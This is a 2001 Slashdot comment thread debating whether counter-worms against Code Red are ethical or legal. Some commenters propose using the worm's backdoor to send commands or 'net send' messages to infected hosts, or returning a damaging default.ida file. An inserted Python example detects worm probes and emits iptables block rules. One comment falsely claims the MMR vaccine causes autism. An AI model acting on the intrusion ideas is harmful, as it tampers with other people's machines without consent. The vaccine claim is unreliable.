    "Karma can only be portioned out by the cosmos." - Homer Simpson [1F10]

  46. Many infected users don't know they're running IIS by fearlessfreddy · · Score: 2, Informative

    I would like to point out that many if not most of the machines that are still being infected by the Code Red worms are operated by users who are not even aware that they are running IIS.

    Case in point, my roommate bought a Dell Dimension L700cx with Windows 2000 about 6 months ago. He was surprised when I showed him that his machine is running IIS and serving the default web page on port 80. This person did nothing to install or activate IIS, the machine was shipped with that configuration.

    I think this fact is important to keep in mind when trying to understand why so many machines remain vulnerable to the IIS attack.

    PS: We run our LAN behind a firewall that denies port 80, so my friend's machine was not infected.

  47. Re:Its entirely possible by FreeForm+Response · · Score: 1

    We need Marcus.

  48. ERRR, HELLO!!! ATTEMPT TO CONTACT WORLD!!! by AKAImBatman · · Score: 1

    Just a thought, but wouldn't it be perfectly legal to use the security hole to do a "net send Your machine is infected with CodeRed!!! Fix it!"? I mean, you are not touching their property, just sending a message. Since they inadvertently contacted you first, I believe that you are within your rights to contact them back. Anyone?

    1. Re:ERRR, HELLO!!! ATTEMPT TO CONTACT WORLD!!! by J'raxis · · Score: 2
      Create a default.ida file on your website (or whatever IIS file the next Windows worm chooses to exploit) with your "terms and services of usage":
      By connecting to this machine, you agree to the following...
  49. Re:I Hope You Keep Bail Money Near Your Gun OT by firewood · · Score: 1

    If you were a burglar in the UK you were (and are) very, very unlikely to get shot even before the "draconian" gun laws came in. There simply weren't enough guns around to make it a worry. So even if burglaries HAVE gone up since then, it's completely and totally unrelated.


    Depends on whether or not you believe in statistics. Someone wrote an entire book on the inverse relationship between private gun ownership and certain categories of crimes; seems to apply whether or not any burglars get shot. Go figure.

  50. Old idea by Gruturo · · Score: 2, Interesting

    It already happened about 15 years ago or so... it was called "Vacsina" and actually cured 1701/Cascade, 1704/format and Jerusalem, if I recall correctly. It was even auto-updating: different vacsina versions would recognize each other and the most recent would overwrite the older. Sadly, a few "nasty" strains came out too....

    --

    Vacuum cleaners suck. Kings rule.
  51. Re:virus vs virus by alfredo · · Score: 1

    I remember that happening on the Mac. I think it was a holiday timebomb. It was classified as a virus, or rather a trojan horse in this case.

    --
    My Photostream
  52. A Solution by prothid · · Score: 1

    All someone needs to do is write something that disinfects hosts that scan it. Then it installs itself on the scanning host and closes the holes and waits for more hosts to scan it. Maybe even have it uninstall itself after a week or two.. or just leave it until the administrator uninstalls it. You could leave a big icon on their desktop or something :P Let the infected machines find you. Don't go searching for infected machines.

  53. Re:Don't be a part of the problem by Archangel+Michael · · Score: 1

    Why do schools neglect an ethics curriculum? They used to. But the US Supreme Court ruled that freedom of religion means freedom from religion.

    Besides, whose ethics are you going to choose. Mine (Militant Legalistic Christian) or yours (liberal anything goes Pinko/Commie)?

    --
    Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
  54. Re:Its entirely possible by jstockdale · · Score: 1

    I just was thinking about the Code Red II and was wondering why a virus would be needed to cure them of the predicament they are in. It seems that because the virus itself opens up a backdoor which can be used to execute any command on the system, it would be possible to broadcast shutdown commands to the networks which the servers lie on. Since the virus itself is harbored in ram, it would be wiped with this. Sure it wouldn't patch the hole, but it would eliminate the threat. Also, IANAL, but I would imagine your liability for this would be much less, as you have altered no authorized data on the server, but (in the spirit of all the great analogies on slashdot today) have just asked for the server to purge itself and it has kindly obliged.

    --
    **AA: a bunch of mindless jerks who'll be the first against the wall when the revolution comes
  55. well... by Heywood+Yabuzof · · Score: 1

    Neither NT nor 2K install IIS by default ... but I'm with you on the way it's set up when you actually do install it - on 2K the default install of IIS includes not only a web server, but FTP and SMTP. Needless to say, not a nice thing to have popping up all over your intranet when developers need to test their web-based apps :-)

  56. Code Red gone in 24hrs by Anonymous Coward · · Score: 0

    If this tool then installed the same service on each system that attacked it, code red would be wiped out very quickly. Just make sure you don't screw up.

  57. Re:Don't be a part of the problem by lobsterGun · · Score: 1

    Does this mean that if someone with the plague is following me around and coughing on me that all I'm allowed to do is to run away or lock myself in my house?

    Or if I'm the resident of a small town and the owner of the local nuke power plant decides to block out the sun to raise my power bill does this mean that I'm not allowed to tip over his sun blocking device?

  58. didn't we see this already? by Kiff · · Score: 1

    In this recent post this same topic was discussed already... or am I missing something? AFAIK, people who owned the systems didn't want it since it violated their systems, and others did want it since it would fix potentially vulnerable systems outside their control.

  59. Re:Because... by Anonymous Coward · · Score: 0

    You're full of shit.

    The scripts to do it are more or less out there, with a bit of tweaking. I could do it, and I have the "lack of ethics" to stop what is essentially a DDoS against my network. Why haven't I? I haven't found a place I'd feel secure in launching from without threat of legal retaliation; i.e. I think I'd get traced and the feds would kick my ass.

  60. The Cheese Worm did this for Lion-infected hosts by Philbert+Desenex · · Score: 2, Informative

    The Cheese Worm seems to constitute exactly what you want. Cheese actually seeks out Linux hosts infected by the Lion worm and removes any backdoor root shells from /etc/inetd.conf . Some say the Cheese Worm constitutes the first hack-of-a-hack known.

    Another first for Linux and Open Source software!

  61. False Sense of Security by khill3210 · · Score: 1

    This suggestion is illegal and unethical. But, more importantly, it leads to a false sense of security. If a worm such as code red infects a box, the box is compromised. Remote users can reconfigure various portions of the box or use the root.exe exploit to basically do whatever they want. Patching the box to prevent further infection would be nice but it would be impossible to undo all the possible damage caused by remote root access to the system. The only way to truly clean a box infected with code red is to power off and reinstall the OS.

  62. Why do schools neglect literary comprehension? by skew · · Score: 1

    "Those who would give up essential liberty, to purchase a little temporary safety, deserve neither liberty nor safety." -- Benjamin Franklin

    Yeah, that means you. You're giving up liberty-- not yours, but theirs....

    Dear old Mr. Franklin must be turning over in his grave! I assume you realize you are misquoting the person who authored the following phrase:

    WE hold these Truths to be self-evident, that all Men are created equal, that they are endowed by their Creator with certain unalienable Rights, that among these are Life, Liberty and the Pursuit of Happiness. -- the (US) Declaration of Independence

    How in the world do you "give up" someone else's liberty? To Franklin, liberty is a right afforded to each person by his Creator, and in the quote you included he was bemoaning those who would sacrifice their own liberty.

    I'm not saying that you don't present a rather strong ethical argument, but don't twist Ben Franklin's words. He was a revolutionary, not a pacifist.

    --

    You can't study the darkness by flooding it with light. --Edward Abbey

  63. Re:Don't be a part of the problem by Anonymous Coward · · Score: 0

    Your solutions should not affect the state of the infected machines..

    [snip]

    ..make a script to firewall off every infected computer for a day

    And if you happen to be an ISP taking this approach? Ooops, you just suggested a solution that affects the state of the infected machines.

    Personally, I'm all for affecting these machines. They aren't in their right minds anymore, so to speak. They're causing damage and need to be stopped. In a month, they won't be, but today they are costing us all thousands in bandwidth.

  64. Re:Virus that installs linux by bigbadwlf · · Score: 1

    Old Billy Gates would just have a heyday with that one, wouldn't he?
    He already claims that Linux is a virus.

  65. Re:Citizen's Arrest by Anonymous Coward · · Score: 0

    "Guns have a lot of benign uses. Ever shot clay pigeons? Ever shoot cans off a fencepost? It's fun!" No offense intended... but historically this activity was practice for killing, and from what I hear heroin is fun, too. The use of guns, heroin or MS products may have unanticipated consequences. The latter being the biggest offender economically. That is unless you wanted to elevate a sub-par silver spooned Harvard student to the status of "World Leader..." (The names have been implied to protect the innocent.)

  66. Why? by sentientbrendan · · Score: 1

    Although I think it is totally ethical to fix security holes in people's software without their knowledge... ok not totally ethical, but of all the unethical things someone does in a day it's probably the least unethical.

    As I was saying. Although I don't think it is too unethical to send out some kind of program to close security holes I don't see why we would do it. Viri that attack correctable security problems primarily go after Windows computers because they represent a large homogeneous population. That is they have a similar problem that the human species has, a shallow gene pool. Humans do not have much genetic variation from person to person. We all have the same strengths and weaknesses which means if we are attacked by something either almost all of us will survive (except those that die by chance) or almost all of us will die (except those of us that survive by chance). Windows boxes are the same, their only variation is represented by their version and a couple of service packs. Windows boxes all have the same bugs and security holes for a virus to go after.

    Anyhow at this point you are wondering why I made that stupid analogy between human genetic variation and code base variation between windows machines. Well as long as these computers exist the only real defense they have is intelligent sys admins. If smart Slashdot readers fix their security problems for them every time some minor upset like this code red virus happens they will never learn to protect their machines, and if that happens we will all be in a real jam when a virus that does have a chance of bringing the flow of information on the net to a grinding halt comes around. Remember it does matter if we are all running a secure box if there are a couple million windows users DDOSing us.

  67. Re:Illegal by 3dr · · Score: 1
    I agree. Intent, in the computer networking field (which is bereft of suitable precedents) doesn't mean a thing here. The "victim", the person with the infected CodeRed'ed IIS box, can legitimately claim they were further hacked by your benevolent fix-it-up antivirus.

    After visiting the antivirus pages on kuro5hin, I immediately wrote up a PHP /default.ida file to NOT probe or exploit their box, but to send this HTTP request:
    GET /your_box_is_infected_with_code_red/please_get_patches_from_microsoft HTTP/1.0

    Should they check their logs (and I'm hoping IIS reports failed requests since I don't know how it works), they'll see this message and maybe, just maybe, they'll do something about it.

    This is an entirely passive, noninvasive approach that uses the existing (and intended) ports on their machine to report the problem. Let's just hope they have ears.

  68. Re:net police by ralmeida · · Score: 1
    I think your analogy is incorrect. Try this one:

    Imagine someone tied a rope around your neighbor's cat, so hard that he becomes aggressive. His cat sees your cat and tries to attack him. You take his cat and remove the rope, and everything is fine.

    The counter-worm won't damage the infected server. It will put it back to its normal state.

    --
    This space left intentionally blank.
  69. Re:This is not the problem... by docstrange · · Score: 0

    The cure worm would not infect systems, it would only clean already infected systems. The cleaning would take place when an infected system scans a "bait" pc. You say this is a bandwidth problem, but a few hundred k patch as opposed to the hundreds of megabytes of bandwidth the worm eats when scanning seems reasonable.

    --
    Remember that you are unique, just like everybody else.
  70. Re:Don't be a part of the problem by jeffphil · · Score: 1

    This is an excellent suggestion. You're not changing any files but an alert will pop-up warning them of the virus.

    Mod this parent up.

    In reality, the people who are infected are probably also dumb enough to have port 139 open to where you could send the `net send...' directly to their IP and technically never touch their machine.

  71. Re:Its entirely possible by Anonymous Coward · · Score: 0
    If you kill him, it's your word against a dead man's. You can say anything you want about how he threatened you, appeared to brandish a weapon, etc. Heck, you could quickly get an illegal handgun and stick it in his hand to seal the case shut.

    News for nerds...and pigs apparently. If you feel so justified in your actions there should be no need for cover up.

    It is obvious people like you act not out of a feeling of right and wrong, but whatever twisted rationalizations you want. I find you repugnant.

    On another note, I am tired of slashdot's policy of labelling those people who do not care to create a slashdot account as "Anonymous Cowards": it is hardly heroic to post under a pseudonym, account or not. Few of the "brave" use their given names when posting garbage such as the post I am responding to.

  72. Re:Don't be a part of the problem by Malcontent · · Score: 2

    Yes but you don't get to decide who is a "danger to yourself or others". A judge has to do that.

    --

    War is necrophilia.

  73. Re:Don't be a part of the problem by Frank+T.+Lofaro+Jr. · · Score: 2

    Ah, but we (as a society) do legally require people to get vaccinated, because doing so benefits society as a whole sufficiently to justify the slight loss of personal freedom

    Not so slight in the case of MMR vaccine which has caused much of the increase in autism cases lately.

    Getting back to computers, what about where the anti-virus-virus causes inadvertent damage to the system because it has an unusual configuration, different software, etc. So instead of fixing the webserver, it utterly kills it. That could happen very easily if you binary patch even a slightly different version of the executable than you were expecting. Then what?

    --
    Just because it CAN be done, doesn't mean it should!
  74. Just 13 years behind the times... by iapetus · · Score: 5, Insightful

    The first such anti-virus virus, Den_Zuko, was discovered in 1988. Check out this article on VNUnet, which has more info on the history of such software and why it's a bad idea.

    More recently, the Linux.Cheese.Worm has done similar things for Linux users infected by the Linux.Lion.Worm.

    --
    ++ Say to Elrond "Hello.".
    Elrond says "No.". Elrond gives you some lunch.
    1. Re:Just 13 years behind the times... by Frank+T.+Lofaro+Jr. · · Score: 2

      We said it was free of VIRUSES, we never said it was free of worms. ;)

      --
      Just because it CAN be done, doesn't mean it should!
    2. Re:Just 13 years behind the times... by Anonymous Coward · · Score: 0

      What?!? A worm on Linux? But you friendly linux zealots told me that only lusers who used Microsoft products were susceptible to virii. You said that everyone should "use da Free sofwear becuz its betr." They said it was immune to virii because of its open source. They lied!

    3. Re:Just 13 years behind the times... by Nater · · Score: 1

      We said it was free of VIRUSES, we never said it was free of worms.

      This is correct, but some definitions are in order.

      A virus is not a program. It is a piece of code which spreads by inserting itself into programs. The inserted copies execute when someone runs the infected program. Essentially, what this means is that a virus exploits weak filesystem security. These are generally not such a big deal on Linux and Unix in general because Unix-like operating systems have strong filesystem security, and the only program files that a user can infect are the ones owned by that user. Stuff installed "on the system" (as opposed to in a user's home directory) is not owned by any of the regular users, but rather by an administrative account, often root. Note that if you are logged in as root, and you happen to run a virus infected binary, you will have a major system-wide virus infection. For this (and other) reasons, the person with the root password is supposed to be intelligent about such things.

      A worm is a program that spreads by copying itself from place to place and then causing the copies to execute. This essentially means that worms spread by exploiting just about any sort of bug. The Code Red, SirCam, and some other major auto-exploits of the last few years have been misidentified as virii, when in fact they are worms. Linux and Unix are susceptible to worms because the majority of worms spread via bugs in programs, and it is a well-understood fact that the occasional bug is inevitable, no matter how vigilant the coder.

      A third variety of exploit is the aptly named trojan horse. A trojan horse spreads by misrepresenting itself to a naive user, and duping the user into running it. The LoveBug and AnnaKournikova email "virii" are actually examples of trojan horses. Linux and Unix are somewhat susceptible to trojan horses, but they are by and large also blocked by the same strong filesystem security and intelligent system administrator that blocks virii.

      --

      I like to play children's songs in minor keys.
      "We're all sons of bitches now." --J. Robert Oppenheimer

    4. Re:Just 13 years behind the times... by Anonymous Coward · · Score: 0

      In '86 there was a BITNET email worm known as Christmas Card. You got an animated text Christmas Card that busily forwarded itself to all the other addresses in your reader (your virtual card reader). A time expiring clone of the worm that behaviorally copied it but also deleted instances of the original was used to help bring the original down.

    5. Re:Just 13 years behind the times... by si1k · · Score: 1

      Note that the people who make money off anti-virus software are the most vociferous in the denouncement of anti-worm worms.

      People cite the fact that the viruses use up bandwidth and may go out of control, but since that's already happening with Code Red I/II, I don't see how that's such a valid argument. The negative possibility is that a counter-worm could just do the same damage as the original worm.

      But since the counter-worm would prioritize fixing systems and not be as aggressive in seeking targets, it would not use as much bandwidth as the existing worm, and since it would replace the existing worm every time it infected, it would not make the situation worse.

      If the worm were well-designed, and if it sought out a meek infection strategy (going after only computers that it knew to be infected, rather than searching randomly), and if it shut the computer or at least web server down after a certain period of activity, it seems it would be beneficial.

  75. "Hard Drive" by thePfhitz · · Score: 1
    A technique like that (using a virus to fight a virus) was used in a book by David Pogue called Hard Drive.

    Seems like a smart idea to me.

  76. Re:Err by jad0 · · Score: 1

    I thought that too, but if you think about it, all the virus would have to do is analyse log files or wait for incoming CR attacks, then patch the *known* infected machines, and look at it this way, you've got a testbed of machines with 60 boxes in it, let's say each one sends out 10 CR attacks a second (only within the range of the 60 machines), that's 600 http requests a second, now if you introduce a counter-worm to one of those machines, you've not only reduced that number to 590, but within the next 6 seconds (or so), you've reduced it to 0 - explain to me how this increases the strain on bandwidth again please? :)

    All you have to do then is tell the worm to wait like 4 hours, then pop up a message saying "patch me bitch!" then wait another 4 hours, check to see if it's patched and then self destruct if it is...

    Jado
    http://www.jado.org

  77. Sircam autoresponse? by iabervon · · Score: 3, Interesting

    It might be possible to make a program that, given a sircam-infected file, would send something to the originator of the message. It could send a message with an attachment that looked for sircam, and, if it found it, removed it and installed the program. That way, it would take a sircam-infected machine and make it respond to future attacks by spreading to the originating machine but do nothing to anyone else.

    The message could even say that was what it was doing.

    "My advice is to run this script to remove the virus and to pass the information on to other people"

    This wouldn't really be a virus at all: the people receive it in response to a request for advice and it is something you actually think they should be running. It doesn't try to infect other machines, except by advising their users to use it; no more illegal than Norton responding to a download request with a program.

  78. Re:Sorry to reinvent the wheel. by ahrenritter · · Score: 1

    Because the update notifier isn't automatically installed. The thing that irritates me most about microsoft is that they make easily exploitable, inadequately tested features like the internet printing capability default, but they don't for something like an automatic patch notification system.

    --

    All I wanted was a rock to wind a piece of string around, and I ended up with the biggest ball of twine in Minnesota
  79. Re:Don't be a part of the problem by Speare · · Score: 1

    American Heritage Dictionary, dictionary.com. [clipped without a copyright attribution, oh no!]

    --
    [ .sig file not found ]
  80. Re:This has already happened by startled · · Score: 1

    Wonderful. He discusses right and wrong, and you attempt to refute with the law. The two are strikingly different.

  81. It actually happened by Anonymous Coward · · Score: 0

    While this approach would be inappropriate today, it was once the only effective means of terminating a runaway computer virus. In fact, in 1985, a malicious Macintosh virus was intercepted and disabled in this way by its benign twin. The original, potentially destructive, virus had escaped the lab and could only be apprehended via a viral mechanism, since there were no systems in place at the time to combat computer viruses.

  82. Re:Its entirely possible by Amanset · · Score: 1

    Imagine a diabetic, an epileptic or any other person with an illness that may leave them in a confused state.

    Now imagine that they, in their confused state, wander onto your property. Maybe you left the front door unlocked and the person thought it was their house. You ordering them about whilst brandishing a weapon confuses them more and they don't follow you word for word.

    Can you legally shoot them? If you can then I hope to Hell I don't live in the same country as you.

  83. Don't be a part of the problem by Speare · · Score: 4, Interesting

    Why do schools neglect an ethics curriculum?

    Your solutions should not affect the state of the infected machines. Even if you could "fix" their machine. Even telling them that their machine is infected is over the line, if you're using their machine to do it.

    If you're being hampered by Code Red hits, make a script to firewall off every infected computer for a day. Allow those firewalls to expire, and if they're still infected, they'll get blocked again.

    • "Those who would give up essential liberty, to purchase a little temporary safety, deserve neither liberty nor safety." -- Benjamin Franklin
    Yeah, that means you. You're giving up liberty-- not yours, but theirs. If you're messing with someone else's machine, you are part of the problem. No matter your intentions, or how nicely you word the "message" you deliver onto their desktop. Just don't touch it.

    If you're going to call it a virus, think of the influenza virus. A medicine is widely available on the market. It is up to the infected party to take the medicine, and it would be unethical to seize the unwitting victim and force the medicine into their bodies.

    It's just a small problem, and in a month, people will just roll their eyes about the terrible outbreak. The best thing to do in a storm is to shelter yourself until it passes, not to rage against the howling winds around you.

    --
    [ .sig file not found ]
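    The expiring block list Speare describes, as an added example that is not from this thread: it reads web server log lines (assumed Apache common log format; the sample lines are constructed and the query string shortened) for the worm's default.ida probes, blocks each source for a day, lets the block lapse, and blocks a host again if it is still probing. Rendering the list as iptables rules is an assumption about the host firewall.

```python
import re
from datetime import datetime, timedelta

# Assumption: the web server writes Apache "common log format" lines.
LOG_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3})'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"
BLOCK_DURATION = timedelta(days=1)   # "firewall off every infected computer for a day"

# Constructed sample log (query strings shortened): two probes from 10.0.0.5 on day one,
# one from 10.0.0.9, a benign request, and both hosts probing again the next morning.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Aug/2001:10:00:00 +0000] "GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0" 404 288
10.0.0.5 - - [10/Aug/2001:10:05:00 +0000] "GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0" 404 288
10.0.0.9 - - [10/Aug/2001:11:00:00 +0000] "GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0" 404 288
10.0.0.7 - - [10/Aug/2001:11:30:00 +0000] "GET /index.html HTTP/1.0" 200 1043
10.0.0.5 - - [11/Aug/2001:10:30:00 +0000] "GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0" 404 288
10.0.0.9 - - [11/Aug/2001:10:31:00 +0000] "GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0" 404 288
"""


def is_code_red_probe(request):
    """The worm's signature request: a GET for /default.ida with a padded query string."""
    return request.startswith("GET /default.ida?")


class ExpiringBlockList:
    """Blocks a source for BLOCK_DURATION, then lets the block lapse. A host that
    probes again after expiry is simply blocked again, as the post describes."""

    def __init__(self, duration=BLOCK_DURATION):
        self.duration = duration
        self.expires_at = {}   # ip -> datetime at which its block lapses
        self.audit = []        # (ip, action, when) for the operator's records

    def expire(self, now):
        """Drop every block whose lifetime has passed; return the released IPs."""
        released = sorted(ip for ip, until in self.expires_at.items() if until <= now)
        for ip in released:
            del self.expires_at[ip]
            self.audit.append((ip, "unblock", now))
        return released

    def observe_probe(self, ip, when):
        """Record a probe from ip at time `when`. Returns True if a new block was added."""
        self.expire(when)
        if ip in self.expires_at:
            return False           # already blocked; nothing to do until the block lapses
        self.expires_at[ip] = when + self.duration
        self.audit.append((ip, "block", when))
        return True

    def is_blocked(self, ip, now):
        self.expire(now)
        return ip in self.expires_at

    def firewall_rules(self):
        """Render the current block list as iptables DROP rules (assumed host firewall)."""
        return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(self.expires_at)]


def process_log(lines, blocklist):
    """Feed log lines (assumed in time order) to the block list; return IPs newly blocked."""
    newly_blocked = []
    for line in lines:
        match = LOG_LINE_RE.match(line)
        if not match or not is_code_red_probe(match.group("request")):
            continue
        when = datetime.strptime(match.group("ts"), TS_FORMAT)
        if blocklist.observe_probe(match.group("ip"), when):
            newly_blocked.append(match.group("ip"))
    return newly_blocked


def run_sample():
    """Run the constructed log through a fresh block list."""
    blocklist = ExpiringBlockList()
    newly = process_log(SAMPLE_LOG.splitlines(), blocklist)
    return newly, blocklist


if __name__ == "__main__":
    newly, bl = run_sample()
    print("blocked, in order:", newly)   # 10.0.0.5 is blocked twice: once per day
    for rule in bl.firewall_rules():
        print(rule)
```

The second probe from 10.0.0.5 on day one is ignored because the host is already blocked; its day-two probe arrives after the 24-hour block has lapsed, so it is blocked afresh while 10.0.0.9, still inside its window, is left alone.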
    1. Re:Don't be a part of the problem by Cro+Magnon · · Score: 1

      Actually, yes! Have you heard about forcing kids who allegedly have attention deficit disorder to take Ritalin? Often they do so on advice from a teacher or school nurse, rather than a MD. There's nothing even remotely ethical about that!

      --
      Slow down, cowboy! It has been 4 hours since you last posted. You must wait another few hours.
    2. Re:Don't be a part of the problem by Anonymous Coward · · Score: 0

      Yeah, do we want the government doing it? How long before everybody decides that the internet can't maintain itself and starts some governmental agency to buckle down on it? I think the internet should be a public place and if anyone can't deal with the growing pains then get off it.

    3. Re:Don't be a part of the problem by Dutchmaan · · Score: 1

      Schools are run by the state.

      Do you really want the state to teach ethics?

      This also makes ethics defined by a body whose ethics change from administration to administration. Not to mention the fact that it can also be used as a tool by the state to teach us from a young age what is acceptable and what is not. The state can change and so can the curriculum taught by it. I'm sure there were plenty of "ethics" lessons in Nazi Germany, but not the ethics we have come to understand today.

    4. Re:Don't be a part of the problem by Idimmu+Xul · · Score: 0
      Why do schools neglect an ethics curriculum?

      I took an ethics course at Uni, and all it really covered was 'Who should we ethically blame?' that's no solution!
      It seems to me that a better course to have attended would be 'How to patch IIS' or 'Installing Linux'!

      --
      The problem with slashdot is that most of its users were bullied and stuffed into lockers as kids!
    5. Re:Don't be a part of the problem by Mr.+Slippery · · Score: 2
      Ethics is religion. Faith is not a Religion.

      No. Ethics is that branch of philosophy that deals with the question, "How shall we live our lives?" There are supernaturalistic theories of ethics (i.e., we should live our lives according to the dictates of some supernatural being), but there are also plenty of theories without a whit of religious belief - utilitarianism, existentialism, Kantian rationalism, and others.

      Applying these theories to the case of an anti-virus virus is left as an exercise for the reader.

      --
      Tom Swiss | the infamous tms | my blog
      You cannot wash away blood with blood
    6. Re:Don't be a part of the problem by Anonymous Coward · · Score: 0

      actually...

      ethics is a school of philosophy that umbrellas a variety of thought and questions, such as "normative ethics" - ie, what is it to say that something is good or bad, "virtue vice theory", which says whether something is right or wrong, and so on. "how should one lead one's life" falls under normative theory.

      also...existentialism is a philosophical approach that places focus upon the individual, not an ethical theory - or even a theory at all. :)

    7. Re:Don't be a part of the problem by Maditude · · Score: 1

      > Frankly, I'm getting sick of Code Red myself. I
      > use DSL, and it crashes my modem, a lot.

      So CHANGE the bloody web-admin port that your DSL
      router (presumably a Cisco 675) is listening on.
      Poof, just like that, code-red will stop hanging your router.

    8. Re:Don't be a part of the problem by tireg · · Score: 0

      Am I ethical if I jump into the moving car and turn it off ?
      Sure, if that's the ONLY thing you do. But what happens if you cause damage to the car? Or some items in the car are missing when the owner gets it back?
      The main issue is that many people could use this "anti-virus virus" as an excuse to (legally? sorry.. didn't read the above posts on legality etc :P) mess with people's machines. They could unintentionally or intentionally cause damage.

    9. Re:Don't be a part of the problem by Anonymous Coward · · Score: 0

      Try NET SEND /DOMAIN "Message". (and you'll need to escape the / and the " -- see post 619).

      This will potentially pop-up on all machines in the domain.

    10. Re:Don't be a part of the problem by mkelley · · Score: 1

      Religion does not have anything to do with ethics. Organized religion needs ethics...

      --

      m.kelley
      life is like a freeway, if you don't look you could miss it.
    11. Re:Don't be a part of the problem by Anonymous Coward · · Score: 0

      It's not the school's job to teach ethics, it's the parents'! And parents today neglect so many of their duties, and then blame schools for it! Some people are just ruthless no matter what kind of upbringing they had! You can only blame that person! Cy.

    12. Re:Don't be a part of the problem by Innominandum · · Score: 1

      This is my perspective: I am not running a server to handle hundreds of "default.ida" GET requests. These requests are a violation of my bandwidth and processing time.

      Admittedly the resources required to handle the requests are small; that does not change the principle. Assuming our laws are "ethical," one has to admit vandalism and trespassing do not always go unpunished.

      But one thing really perplexes me. Code Red has been in the media spotlight for weeks (?) now and it still runs rampant. What will it take to get these people to get off of their fat asses and fix their servers?

      Forgive my ignorance on this issue, but would it be possible to send back a bogus "default.ida" that will ruin their setup? What is this file anyway?

      This is the best solution. The lazy-ass who is administering the server will be punished, it will draw attention to the problem, and may prevent further intrusions until the problem is fixed.

    13. Re:Don't be a part of the problem by Phork · · Score: 1

      this looks strangely like a post i saw on k5 earlier.

      --
      -- free as in swatantryam - not soujanyam.
    14. Re:Don't be a part of the problem by Frank+T.+Lofaro+Jr. · · Score: 2

      If you're going to call it a virus, think of the influenza virus. A medicine is widely available on the market. It is up to the infected party to take the medicine, and it would be unethical to seize the unwitting victim and force the medicine into their bodies.

      Well with certain diseases, we DO force people to take medicine, even before they get the disease. FORCED immunizations. Do you agree that that is just as wrong?

      --
      Just because it CAN be done, doesn't mean it should!
    15. Re:Don't be a part of the problem by CodeMonky · · Score: 1

      What happens when the anti-virus you are running on someone's machine without their permission messes up and their machine stops running?

      --
      --"Karma is justice without the satisfaction"
    16. Re:Don't be a part of the problem by nidarus · · Score: 1
      If you're going to call it a virus, think of the influenza virus. A medicine is widely available on the market.

      Ahm, I know it's kinda offtopic, but does a medicine for the influenza virus (including all of its strains) exist? What is it?

    17. Re:Don't be a part of the problem by i0lanthe · · Score: 2
      I think you could argue rather strongly that you are taking such action in the interest of public safety.

      I think you could argue that rather strongly too, but I also think that the prosecution will make mincemeat of it unless you have a really good lawyer arguing rather strongly alongside you, in which case the prosecution will have to settle for making something less finely ground, such as Dinty Moore beef stew, of it.

      --
      "The Crystal Wind is the Storm, and the Storm is Data, and the Data is Life"
    18. Re:Don't be a part of the problem by trcooper · · Score: 2
      Ethics is all about the shades of grey between black and white. Legality however should have no shades of grey.

      Something may be ethical, but not legal, and vice versa. In this case, a white-hat worm would most certainly be illegal, because you are modifying someone's property without their consent, but to simply say it isn't ethical doesn't look at the whole picture.

      What has to be asked is do people benefit more from your actions than the harm being caused? If this is so, you can ethically justify your actions. If by modifying one person's machine you prevent 50 from being infected, you're doing overall good, and while still outside the law, you are benefiting society.

      If a white-hat worm were to be released into the wild and become widespread and clean up code red's damage, I think it would spark a lot of conversation on the potential of other such worms and the regulation of them for their possible future and beneficial use.

    19. Re:Don't be a part of the problem by Archangel+Michael · · Score: 1

      Ethics is religion. Faith is not a Religion. You must understand the difference.

      --
      Agent K: A *person* is smart. People are dumb, stupid, panicky animals, and you know it.
    20. Re:Don't be a part of the problem by Anonymous Coward · · Score: 0

      The reasonable man changes himself to fit the world. The unreasonable man changes the world to fit himself. Therefore, all progress is made by the unreasonable man.

    21. Re:Don't be a part of the problem by mashy · · Score: 1

      A medicine is widely available on the market. It is up to the infected party to take the medicine, and it would be unethical to seize the unwitting victim and force the medicine into their bodies.

      I agree with that except that I doubt most of the attacking machines' owners even realize they're infected, and in many cases even running IIS.

      I'm still not saying it would then be ethical to force disinfecting code into their machines, but it's kind of like spraying for virus-carrying mosquitos (or whatever bugs it's for) in some areas. Residents don't always do their part in clearing water from their yards. Many don't even realize they provided a breeding ground in their yards, some are aware that a problem exists but don't think that they could be part of the problem, and others never got word about it at all. So, the city comes out and sprays for them.
      Is it right for the city to just come and take care of the pest problem in everyone's backyard? Maybe. In this case they don't expect every person and animal to defend itself against poisonous mosquitos by putting insect repellent on themselves and their pets. Homeowners are part of a community and are contributing to a problem within it. This is sort of like the internet. Should we leave these contagious users to be and hope everyone else can handle it?

    22. Re:Don't be a part of the problem by Keviniano · · Score: 1
      Why do schools neglect an ethics curriculum?
      Well, even if schools didn't neglect an ethics curriculum, that doesn't mean we'd all come to the same conclusion you did. Any ethics class worth anything is about critical thinking and asking questions, not what's absolutely right and wrong.

      Take the case of fluoridation of water and the adding of iodine to salt. Everyone within the range of distribution is forced to take those medicinal substances unless they take special action to filter their water or use sea salt. Those who pushed for this kind of thing reasoned that it was worth it to mess "with someone else's machine" for the greater social good it achieved. How many people you see with goiters these days?

    23. Re:Don't be a part of the problem by Nater · · Score: 1

      NOBODY is required to be immunized against anything by the government. School districts require it, yes. But there are people out there who have NOT been vaccinated for various "standard-vaccination" type diseases

      Ahem... you could be talking about any one of hundreds of governments in this world and the person you responded to could be talking about any one of the other governments. I was required by the government of Australia to get certain vaccinations (I forget which) before visiting the country.

      Also, note that in many cases, the school district is an organ of the government at some level. In grade school I was required by the school district (an organ of the state government) to get certain immunizations before entering school. Calling it a demand of the school district vs. a demand of the government is like arguing big endian vs. little endian.

      However, you raise an interesting possibility, specifically, that it was a lower authority that demanded immunization. IIRC, the ToS for my DSL connection at the office includes clauses about spreading virii. Under those clauses, it would be perfectly legitimate for an ISP to shut down a connection to an infected site at its sole discretion. The latest Code Red preferentially attacks its own /24, and so an infected site is essentially hitting its ISP's other customers. If some of you are having big enough problems with your DSL routers, it might bear fruit to contact your ISP about shutting down the offenders, but do check your ToS first.

      --

      I like to play children's songs in minor keys.
      "We're all sons of bitches now." --J. Robert Oppenheimer

    24. Re:Don't be a part of the problem by gad_zuki! · · Score: 2

      It is up to the infected party to take the medicine, and it would be unethical to seize the unwitting victim and force the medicine into their bodies.

      A couple points:

